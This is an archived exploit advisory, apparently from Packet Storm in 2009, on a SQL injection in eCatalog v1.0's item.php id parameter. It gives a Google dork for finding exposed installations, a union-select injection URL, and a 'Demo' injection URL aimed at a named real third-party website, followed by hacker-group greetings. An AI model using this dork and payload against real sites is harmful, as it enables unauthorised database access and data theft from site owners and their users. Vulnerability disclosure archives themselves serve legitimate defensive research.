eCatalog Software SQL Injection

2009-09-21T00:00:00
ID PACKETSTORM:81473
Type packetstorm
Reporter Don Tukulesto
Modified 2009-09-21T00:00:00

Description

                                        
                                            `#############################################################  
## eCatalog Software - item.php?id ##  
## Author : Don Tukulesto (tukulesto[at]hackermail[dot]com)##  
## Homepage : http://www.indonesiancoder.com ##  
## Date : Sunday, August 30, 2009 ##  
#############################################################  
  
[ Software Information ]  
  
[+] Software : eCatalog v1.0  
[+] Vulnerability : SQL injection  
[+] Google Dork : inurl:item.php?id "eCatalog"  
  
#############################################################  
  
[ POC ]  
  
http://127.0.0.1/item.php?id=[ID]+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--  
  
[ID] = Valid ID  
  
[ Demo ]  
  
http://www.ibcom.com.my/catalog/item.php?id=-493+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--  
  
#############################################################  
  
[ Greetings ]  
  
[~] All of Indonesian Coder Member, mistersaint, gonzhack, m364tr0n, m3nw5, TUCKER, Petrucii, Chercut,  
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d  
[~] All of Surabayahackerlink Member, bejat Bejat, Plaque, rey_cute, Tuex, XNITRO, DraCoola  
[~] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu, eminem  
[~] Kill-9 crew, kaMtiEz, arianom, tiw0L, Pathloader, RoNz dan kalian semua.  
  
[ QUOTE ]  
  
Wahai kau MALINGSIAL, Jangan kau coba ganggu kami.  
Kami bangsa INDONESIA siap sedia membela negara kami INDONESIA.`